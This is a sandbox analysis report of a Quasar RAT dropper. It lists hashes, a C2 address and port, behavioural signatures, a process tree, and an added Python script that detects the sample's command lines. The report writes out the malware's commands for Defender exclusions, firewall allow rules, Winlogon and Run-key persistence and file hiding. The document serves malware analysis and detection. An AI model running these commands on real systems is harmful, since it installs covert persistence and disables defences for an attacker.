Analysis

max time kernel: 149s
max time network: 154s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
submitted: 01-11-2024 17:31

Static task: static1
Behavioral task: behavioral1
  Sample: c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe
  Resource: win7-20241010-en
Behavioral task: behavioral2
  Sample: c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe
  Resource: win10v2004-20241007-en

All behavioral IoCs in this report carry the behavioral1/ prefix, i.e. they come from the Windows 7 x64 run.

General

Target: c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe
Size: 1.4MB
MD5: f26ef938c2c4235c5e4cdb4ebb801fca
SHA1: 7c3413c638ea0c93cf2951cf05249df89bd98ff8
SHA256: c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272
SHA512: 84d9d421b6794d412f55d8db296d55b46d25c0980da4a75eacf39d9ad912403bfd0a09142c907328df47b0a676826bd8a0ac422d6e89541da5ca49c13f073096
SSDEEP: 24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk
Malware Config

Extracted: quasar 1.3.0.0
C2: 94.131.105.161:12344
mutex: QSR_MUTEX_UEgITWnMKnRP3EZFzK
encryption_key: 5Q0JQBQQfAUHRJTcAIOF
install_name: lient.exe
log_directory: Lugs
reconnect_delay: 3000
startup_key: itartup
subdirectory: SubDir
Signatures

Modifies WinLogon for persistence 2 TTPs 2 IoCs
Winlogon launches every comma-separated entry in the Shell value at logon, so appending C:\Users\Admin\Music\rot.exe after explorer.exe starts the RAT alongside the normal shell without replacing it.
Processes: reg.exe, reg.exe
- Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\Music\\rot.exe," (reg.exe)
- Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\Music\\rot.exe," (reg.exe)
Quasar family

Quasar payload 5 IoCs
All five hits are in the memory of PID 2788 (InstallUtil.exe), at the same 0x400000-0x45E000 image range, across successive dumps.
Processes (resource, yara rule):
- behavioral1/memory/2788-95-0x0000000000400000-0x000000000045E000-memory.dmp, family_quasar
- behavioral1/memory/2788-97-0x0000000000400000-0x000000000045E000-memory.dmp, family_quasar
- behavioral1/memory/2788-100-0x0000000000400000-0x000000000045E000-memory.dmp, family_quasar
- behavioral1/memory/2788-102-0x0000000000400000-0x000000000045E000-memory.dmp, family_quasar
- behavioral1/memory/2788-101-0x0000000000400000-0x000000000045E000-memory.dmp, family_quasar
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes. In this run five of the six powershell.exe instances each add a single Add-MpPreference exclusion (four -ExclusionPath, one -ExclusionProcess, all covering ratt.exe or the directories it is dropped into); the sixth (PID 580) runs the dropped Add.ps1 with -WindowStyle Hidden.
Processes: powershell.exe (PID 2780), powershell.exe (PID 2552), powershell.exe (PID 1388), powershell.exe (PID 1472), powershell.exe (PID 436), powershell.exe (PID 580)
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes: netsh.exe (PID 2356), netsh.exe (PID 2148)
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
Processes (resource, yara rule):
- behavioral1/files/0x0003000000018334-54.dat, acprotect
Executes dropped EXE 4 IoCs
Processes: 7z.exe (PID 3004), ratt.exe (PID 1636), ratt.exe (PID 720), rot.exe (PID 1288)
Loads dropped DLL 6 IoCs
Processes: cmd.exe (PID 2928), cmd.exe (PID 2928), 7z.exe (PID 3004), powershell.exe (PID 580), cmd.exe (PID 2928), cmd.exe (PID 1532)
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port. The destination, 208.67.222.222, is OpenDNS's resolver1.opendns.com, which the batch file queries directly (nslookup myip.opendns.com. resolver1.opendns.com) to learn the host's public IP address; the three flows are that lookup, not an additional DNS channel.
Processes:
- Destination IP 208.67.222.222
- Destination IP 208.67.222.222
- Destination IP 208.67.222.222
Adds Run key to start application 2 TTPs 1 IoCs
The command targets HKLM\Software\Microsoft\Windows\CurrentVersion\Run, but because it is issued by the 32-bit reg.exe under C:\Windows\SysWOW64 the write is redirected to Wow6432Node on this x64 system. Windows processes that Run key at logon too, so the entry is still effective.
Processes: reg.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ratt = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ratt.exe" (reg.exe)
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
- flow 6: ip-api.com
Suspicious use of SetThreadContext 1 IoCs
rot.exe (PID 1288) sets the thread context of PID 2788, the InstallUtil.exe child it spawned. Together with the Quasar payload YARA hits in PID 2788's memory at 0x400000-0x45E000 and the fact that InstallUtil.exe was started with no arguments, this is consistent with the RAT being injected into the legitimate .NET InstallUtil.exe host, which is why the Quasar detections are attributed to InstallUtil.exe rather than to rot.exe.
Processes: rot.exe
- PID 1288 set thread context of 2788 (rot.exe, procid_target 70)
UPX packed file (yara rule upx) 6 IoCs
Two dropped files and the memory of PID 3004 (the dropped 7z.exe) match the UPX packer rule; the file 0x0003000000018334-54.dat also matched the ACProtect rule above.
Processes (resource, yara rule):
- behavioral1/files/0x0009000000018b28-48.dat, upx
- behavioral1/memory/3004-53-0x0000000000400000-0x0000000000432000-memory.dmp, upx
- behavioral1/files/0x0003000000018334-54.dat, upx
- behavioral1/memory/3004-56-0x0000000010000000-0x00000000100E2000-memory.dmp, upx
- behavioral1/memory/3004-58-0x0000000000400000-0x0000000000432000-memory.dmp, upx
- behavioral1/memory/3004-62-0x0000000000400000-0x0000000000432000-memory.dmp, upx
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. The IoCs here are reads (key opened, key queried, values enumerated) of HKLM\SOFTWARE\Wow6432Node\Microsoft\NetSh by the two netsh.exe instances that add the firewall rules; netsh consults this key on start-up to load its registered helper DLLs, and the report records no write to it, so no Netsh helper DLL persistence is evidenced in this run.
Processes: netsh.exe, netsh.exe
- Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh (netsh.exe)
- Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh (netsh.exe)
- Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh (netsh.exe)
- Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh (netsh.exe)
- Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh (netsh.exe)
- Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh (netsh.exe)
System Location Discovery: System Language Discovery 1 TTPs 36 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host. Note that this signature fired for every process in the tree, including PING.EXE, attrib.exe and nslookup.exe, so on its own it carries little signal for this sample.
Processes: all 36 IoCs are "Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language", by cmd.exe (9), powershell.exe (6), PING.EXE (5), reg.exe (3), WMIC.exe (3), netsh.exe (2), ratt.exe (2), and once each by 7z.exe, attrib.exe, c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe, InstallUtil.exe, nslookup.exe and rot.exe.
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 9 IoCs
Adversaries may check for Internet connectivity on compromised systems. Here, however, every ping targets 127.0.0.1 with -n 7, 8, 14 or 20 and its output is sent to nul: this is the standard batch-file sleep (roughly one second per echo) used to delay the REG ADD of the Winlogon Shell value and the copy of ratt.exe to rot.exe, not a connectivity check.
Processes: cmd.exe (PID 880), cmd.exe (PID 680), PING.EXE (PID 2092), cmd.exe (PID 2736), PING.EXE (PID 1332), PING.EXE (PID 2604), PING.EXE (PID 2568), PING.EXE (PID 1648), cmd.exe (PID 1532)
Runs ping.exe 1 TTPs 5 IoCs
Processes: PING.EXE (PID 2092), PING.EXE (PID 1648), PING.EXE (PID 1332), PING.EXE (PID 2604), PING.EXE (PID 2568)
Suspicious behavior: EnumeratesProcesses 17 IoCs
Processes: powershell.exe (PIDs 2780, 2552, 1388, 1472, 436, 580, once each), ratt.exe (PID 1636, 4 times), ratt.exe (PID 720, 4 times), rot.exe (PID 1288, 3 times)
Suspicious use of AdjustPrivilegeToken 64 IoCs
The two WMIC.exe instances enable every privilege present in their token, which is wmic's own start-up behaviour rather than something specific to this sample; the six powershell.exe instances each enable SeDebugPrivilege. Privilege LUIDs 33, 34 and 35, which the sandbox leaves unnamed, are SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege and SeCreateSymbolicLinkPrivilege. The listing stops at 64 entries.
Processes: WMIC.exe (PID 2996), powershell.exe (PIDs 2780, 2552, 1388, 1472, 436, 580), WMIC.exe (PID 2632)
- WMIC.exe PID 2996, the same sequence recorded twice (40 IoCs): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
- powershell.exe PIDs 2780, 2552, 1388, 1472, 436, 580 (6 IoCs): SeDebugPrivilege
- WMIC.exe PID 2632 (18 IoCs, cut off by the 64-entry cap): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33
Suspicious use of SetWindowsHookEx 1 IoCs
Processes: InstallUtil.exe (PID 2788)
Suspicious use of WriteProcessMemory 64 IoCs
Every entry is a parent writing into a child it has just spawned (the same pairs appear in the process tree), which is ordinary process-creation behaviour; the injection indicator in this run is the SetThreadContext call from rot.exe into InstallUtil.exe, not these writes. Each pair is recorded four times and the listing stops at 64 entries.
Processes: c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe, cmd.exe, cmd.exe, cmd.exe, powershell.exe, cmd.exe
Parent PID -> child PID (parent image, procid_target), each x4:
- 2512 -> 2928 (c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe, 30)
- 2928 -> 2896 (cmd.exe, 32)
- 2896 -> 2904 (cmd.exe, 33)
- 2928 -> 2032 (cmd.exe, 34)
- 2032 -> 2996 (cmd.exe, 35)
- 2928 -> 2780 (cmd.exe, 37)
- 2928 -> 2552 (cmd.exe, 38)
- 2928 -> 1388 (cmd.exe, 39)
- 2928 -> 1472 (cmd.exe, 40)
- 2928 -> 436 (cmd.exe, 41)
- 2928 -> 3004 (cmd.exe, 42)
- 2928 -> 580 (cmd.exe, 43)
- 580 -> 2356 (powershell.exe, 44)
- 580 -> 2148 (powershell.exe, 45)
- 580 -> 2232 (powershell.exe, 46)
- 2232 -> 2632 (cmd.exe, 47)
Views/modifies file attributes 1 TTPs 1 IoCs
Processes: attrib.exe (PID 2584), which sets +h on the dropped Startup-folder copy of ratt.exe (see the process tree).

Processes
Indentation shows parent/child depth; the bullets under each process are the signatures it triggered.

PID 2512  C:\Users\Admin\AppData\Local\Temp\c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\c5771e769360e622765173e2845bae54b79092ad52c0cbf4c52b668b4e740272.exe"
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
    PID 2928  C:\Windows\SysWOW64\cmd.exe
      cmdline: cmd /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
      - Loads dropped DLL
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
        PID 2896  C:\Windows\SysWOW64\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
            PID 2904  C:\Windows\SysWOW64\nslookup.exe
              cmdline: nslookup myip.opendns.com. resolver1.opendns.com
              - System Location Discovery: System Language Discovery
        PID 2032  C:\Windows\SysWOW64\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
            PID 2996  C:\Windows\SysWOW64\Wbem\WMIC.exe
              cmdline: wmic ComputerSystem get Domain
              - System Location Discovery: System Language Discovery
              - Suspicious use of AdjustPrivilegeToken
        PID 2780  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        PID 2552  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        PID 1388  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        PID 1472  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        PID 436  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        PID 3004  C:\Users\Admin\AppData\Local\Temp\7z.exe
          cmdline: 7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
          - Executes dropped EXE
          - Loads dropped DLL
          - System Location Discovery: System Language Discovery
        PID 580  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
          - Command and Scripting Interpreter: PowerShell
          - Loads dropped DLL
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
            PID 2356  C:\Windows\SysWOW64\netsh.exe
              cmdline: "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
              - Modifies Windows Firewall
              - Event Triggered Execution: Netsh Helper DLL
              - System Location Discovery: System Language Discovery
            PID 2148  C:\Windows\SysWOW64\netsh.exe
              cmdline: "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
              - Modifies Windows Firewall
              - Event Triggered Execution: Netsh Helper DLL
              - System Location Discovery: System Language Discovery
            PID 2232  C:\Windows\SysWOW64\cmd.exe
              cmdline: "C:\Windows\system32\cmd.exe"
              - System Location Discovery: System Language Discovery
              - Suspicious use of WriteProcessMemory
                PID 2632  C:\Windows\SysWOW64\Wbem\WMIC.exe
                  cmdline: wmic computersystem where name="BCXRJFKE" set AutomaticManagedPagefile=False
                  - System Location Discovery: System Language Discovery
                  - Suspicious use of AdjustPrivilegeToken
            PID 1820  C:\Windows\SysWOW64\cmd.exe
              cmdline: "C:\Windows\system32\cmd.exe"
              - System Location Discovery: System Language Discovery
                PID 1596  C:\Windows\SysWOW64\Wbem\WMIC.exe
                  cmdline: wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
                  - System Location Discovery: System Language Discovery
            PID 1636  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
              cmdline: "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
                PID 880  C:\Windows\SysWOW64\cmd.exe
                  cmdline: "cmd" /c ping 127.0.0.1 -n 8 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
                  - System Location Discovery: System Language Discovery
                  - System Network Configuration Discovery: Internet Connection Discovery
                    PID 2092  C:\Windows\SysWOW64\PING.EXE
                      cmdline: ping 127.0.0.1 -n 8
                      - System Location Discovery: System Language Discovery
                      - System Network Configuration Discovery: Internet Connection Discovery
                      - Runs ping.exe
                    PID 2388  C:\Windows\SysWOW64\reg.exe
                      cmdline: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
                      - Modifies WinLogon for persistence
                      - System Location Discovery: System Language Discovery
                PID 2736  C:\Windows\SysWOW64\cmd.exe
                  cmdline: "cmd" /c ping 127.0.0.1 -n 20 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 20 > nul && "C:\Users\Admin\Music\rot.exe"
                  - System Location Discovery: System Language Discovery
                  - System Network Configuration Discovery: Internet Connection Discovery
                    PID 1332  C:\Windows\SysWOW64\PING.EXE
                      cmdline: ping 127.0.0.1 -n 20
                      - System Location Discovery: System Language Discovery
                      - System Network Configuration Discovery: Internet Connection Discovery
                      - Runs ping.exe
            PID 2584  C:\Windows\SysWOW64\attrib.exe
              cmdline: "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
              - System Location Discovery: System Language Discovery
              - Views/modifies file attributes
        PID 1684  C:\Windows\SysWOW64\reg.exe
          cmdline: REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
          - Adds Run key to start application
          - System Location Discovery: System Language Discovery
        PID 720  C:\Users\Admin\AppData\Local\Temp\ratt.exe
          cmdline: "ratt.exe"
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
            PID 680  C:\Windows\SysWOW64\cmd.exe
              cmdline: "cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
              - System Location Discovery: System Language Discovery
              - System Network Configuration Discovery: Internet Connection Discovery
                PID 1648  C:\Windows\SysWOW64\PING.EXE
                  cmdline: ping 127.0.0.1 -n 7
                  - System Location Discovery: System Language Discovery
                  - System Network Configuration Discovery: Internet Connection Discovery
                  - Runs ping.exe
                PID 2120  C:\Windows\SysWOW64\reg.exe
                  cmdline: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
                  - Modifies WinLogon for persistence
                  - System Location Discovery: System Language Discovery
            PID 1532  C:\Windows\SysWOW64\cmd.exe
              cmdline: "cmd" /c ping 127.0.0.1 -n 14 > nul && copy "C:\Users\Admin\AppData\Local\Temp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 14 > nul && "C:\Users\Admin\Music\rot.exe"
              - Loads dropped DLL
              - System Location Discovery: System Language Discovery
              - System Network Configuration Discovery: Internet Connection Discovery
                PID 2604  C:\Windows\SysWOW64\PING.EXE
                  cmdline: ping 127.0.0.1 -n 14
                  - System Location Discovery: System Language Discovery
                  - System Network Configuration Discovery: Internet Connection Discovery
                  - Runs ping.exe
                PID 2568  C:\Windows\SysWOW64\PING.EXE
                  cmdline: ping 127.0.0.1 -n 14
                  - System Location Discovery: System Language Discovery
                  - System Network Configuration Discovery: Internet Connection Discovery
                  - Runs ping.exe
                PID 1288  C:\Users\Admin\Music\rot.exe
                  cmdline: "C:\Users\Admin\Music\rot.exe"
                  - Executes dropped EXE
                  - Suspicious use of SetThreadContext
                  - System Location Discovery: System Language Discovery
                  - Suspicious behavior: EnumeratesProcesses
                    PID 2788  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                      cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      - System Location Discovery: System Language Discovery
                      - Suspicious use of SetWindowsHookEx
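The process tree above is a compact record of the dropper's whole playbook: Add-MpPreference exclusions, netsh allow rules for ratt.exe, REG ADD on the Winlogon Shell value, a HKLM Run key, loopback pings as sleeps, and an OpenDNS lookup for the public IP. The script below is an added example written for this page (it is not part of the sandbox report and not code from the sample) showing how a responder would triage such command lines offline. The sample input is constructed by copying command lines from the tree; the function names are this example's own; the ping-as-sleep estimate assumes roughly one second between echoes, as the report's -n counts imply.

```python
"""Triage of the command lines from a sandbox process tree.

Added example for this page; not part of the sandbox report and not code
from the Quasar sample. It reproduces, as plain string matching, the checks a
responder runs over the tree above: Defender exclusions, netsh firewall allow
rules, Winlogon Shell tampering, Run-key persistence, loopback-ping delays and
external IP lookups.
"""
import re

# Constructed sample input: command lines copied from the process tree above.
SAMPLE_CMDLINES = [
    'Powershell -Command \'Add-MpPreference -ExclusionPath "C:\\Users\\Admin\\AppData\\Local\\Temp\\ratt.exe"\'',
    'Powershell -Command \'Add-MpPreference -ExclusionProcess "C:\\Users\\Admin\\AppData\\Local\\Temp\\ratt.exe"\'',
    '"C:\\Windows\\system32\\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow '
    '"program=C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\ratt.exe" enable=yes',
    '"cmd" /c ping 127.0.0.1 -n 8 > nul && REG ADD "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" '
    '/f /v "Shell" /t REG_SZ /d "explorer.exe,C:\\Users\\Admin\\Music\\rot.exe,"',
    '"cmd" /c ping 127.0.0.1 -n 20 > nul && copy "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\ratt.exe" '
    '"C:\\Users\\Admin\\Music\\rot.exe" && ping 127.0.0.1 -n 20 > nul && "C:\\Users\\Admin\\Music\\rot.exe"',
    'REG ADD "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "ratt" /t REG_SZ '
    '/d "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ratt.exe" /F',
    'C:\\Windows\\system32\\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com',
    'wmic ComputerSystem get Domain',
]

# External-IP services the report shows this sample contacting.
EXTERNAL_IP_SERVICES = ("myip.opendns.com", "ip-api.com")


def defender_exclusions(cmdline):
    """(kind, value) for each -ExclusionPath/-ExclusionProcess/-ExclusionExtension
    argument of an Add-MpPreference or Set-MpPreference call; [] otherwise."""
    if not re.search(r"\b(Add|Set)-MpPreference\b", cmdline, re.I):
        return []
    hits = re.findall(r'-Exclusion(Path|Process|Extension)\s+(?:"([^"]+)"|(\S+))', cmdline, re.I)
    return [(kind.lower(), quoted or bare) for kind, quoted, bare in hits]


def firewall_allow_rule(cmdline):
    """Parse 'netsh advfirewall firewall add rule ...' into its name/dir/action/program
    fields, or None. Handles the report's quoting, where the quotes wrap the whole
    program=... token instead of just the path."""
    if not re.search(r"advfirewall\s+firewall\s+add\s+rule\b", cmdline, re.I):
        return None

    def field(name):
        m = re.search(rf'"{name}=([^"]+)"|{name}="([^"]+)"|{name}=(\S+)', cmdline, re.I)
        return next((g for g in m.groups() if g), None) if m else None

    return {k: field(k) for k in ("name", "dir", "action", "program")}


def winlogon_shell_extras(cmdline):
    """For 'REG ADD ...\\Winlogon /v Shell /d <value>' return the comma-separated
    entries other than explorer.exe (Winlogon launches each one at logon).
    None if not a Winlogon Shell write; [] if the value is the clean default."""
    m = re.search(r'reg\s+add\s+"?([^"]*\\Winlogon)"?.*?/v\s+"?Shell"?.*?/d\s+"([^"]*)"',
                  cmdline, re.I)
    if not m:
        return None
    entries = [e.strip() for e in m.group(2).split(",") if e.strip()]
    return [e for e in entries if e.lower() != "explorer.exe"]


def run_key_entry(cmdline):
    """Parse 'REG ADD ...\\CurrentVersion\\Run[Once] /v <name> /d <command>' or None."""
    m = re.search(r'reg\s+add\s+"?([^"]*CurrentVersion\\Run(?:Once)?)"?.*?/v\s+"?([^"\s]+)"?.*?/d\s+"([^"]*)"',
                  cmdline, re.I)
    if not m:
        return None
    return {"key": m.group(1), "name": m.group(2), "command": m.group(3)}


def ping_delay_seconds(cmdline):
    """'ping 127.0.0.1 -n N' is a batch-file sleep: N echoes about one second apart,
    so roughly N-1 seconds (assumption). Sum over all such pings; 0 if none."""
    return sum(max(int(n) - 1, 0)
               for n in re.findall(r"ping\s+127\.0\.0\.1\s+-n\s+(\d+)", cmdline, re.I))


def external_ip_lookup(cmdline):
    """True if the command line contacts one of the known external-IP services."""
    low = cmdline.lower()
    return any(svc in low for svc in EXTERNAL_IP_SERVICES)


def triage(cmdlines):
    """Run every check over a list of command lines; returns (technique, detail) pairs."""
    findings = []
    for c in cmdlines:
        for kind, value in defender_exclusions(c):
            findings.append(("defender_exclusion", f"{kind}: {value}"))
        rule = firewall_allow_rule(c)
        if rule:
            findings.append(("firewall_rule", f"{rule['dir']} {rule['action']} {rule['program']}"))
        extras = winlogon_shell_extras(c)
        if extras:
            findings.append(("winlogon_shell", ", ".join(extras)))
        run = run_key_entry(c)
        if run:
            findings.append(("run_key", f"{run['name']} -> {run['command']}"))
        delay = ping_delay_seconds(c)
        if delay:
            findings.append(("ping_delay", f"~{delay}s of loopback-ping sleep"))
        if external_ip_lookup(c):
            findings.append(("external_ip_lookup", c))
    return findings


if __name__ == "__main__":
    for technique, detail in triage(SAMPLE_CMDLINES):
        print(f"{technique:20} {detail}")
```

Run against the eight constructed command lines this yields two Defender exclusions, one firewall rule, one Winlogon Shell extra (C:\Users\Admin\Music\rot.exe), one Run key, two ping delays (about 7 s and 38 s) and one external IP lookup; the wmic line produces nothing. The Winlogon check deliberately returns the list of non-explorer entries rather than a boolean so that the clean default value `explorer.exe` is distinguishable from a missing Shell write, and the firewall parser tolerates the unusual `"program=...path..."` quoting seen in this report, which a naive `program="..."` pattern would miss.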
Network
MITRE ATT&CK Enterprise v15

Persistence
- Boot or Logon Autostart Execution (2): Registry Run Keys / Startup Folder (1), Winlogon Helper DLL (1)
- Create or Modify System Process (1): Windows Service (1)
- Event Triggered Execution (1): Netsh Helper DLL (1)

Privilege Escalation
- Boot or Logon Autostart Execution (2): Registry Run Keys / Startup Folder (1), Winlogon Helper DLL (1)
- Create or Modify System Process (1): Windows Service (1)
- Event Triggered Execution (1): Netsh Helper DLL (1)

Defense Evasion
- Hide Artifacts (1): Hidden Files and Directories (1)
- Impair Defenses (1): Disable or Modify System Firewall (1)
- Modify Registry (2)
Downloads

- Filesize: 328KB
  MD5: 15bbbe562f9be3e5dcbb834e635cc231
  SHA1: 7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a
  SHA256: ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde
  SHA512: 769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

- Filesize: 1KB
  MD5: 0df43097e0f0acd04d9e17fb43d618b9
  SHA1: 69b3ade12cb228393a93624e65f41604a17c83b6
